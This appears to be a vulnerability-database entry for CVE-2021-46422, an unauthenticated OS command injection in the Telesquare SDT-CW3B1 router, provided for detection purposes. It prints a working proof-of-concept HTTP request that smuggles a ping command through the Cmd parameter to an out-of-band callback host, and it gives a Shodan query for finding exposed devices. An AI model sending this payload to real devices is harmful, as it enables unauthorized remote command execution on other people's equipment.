🔙 목록으로 돌아가기

CVE-2021-46422: SDT-CW3B1 1.1.0 - OS Command Injection

TitleSDT-CW3B1 1.1.0 - OS Command Injection
Authorbadboycxcc,prajiteshsingh
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
RemediationUpgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.93876
CVE IDCVE-2021-46422
CWE IDCWE-78
Shodan Queryhtml:"SDT-CW3B1"
Tags cve2021 cve packetstorm telesquare rce router injection edb vkev vuln

🔍 Vulnerability Description

Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

🌐 HTTP Request

GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ping${IFS}-c${IFS}1${IFS}d5jocuple0o2lh0g0ti0ruwgatw8nig7n.oast.online HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-46422.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-46422.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A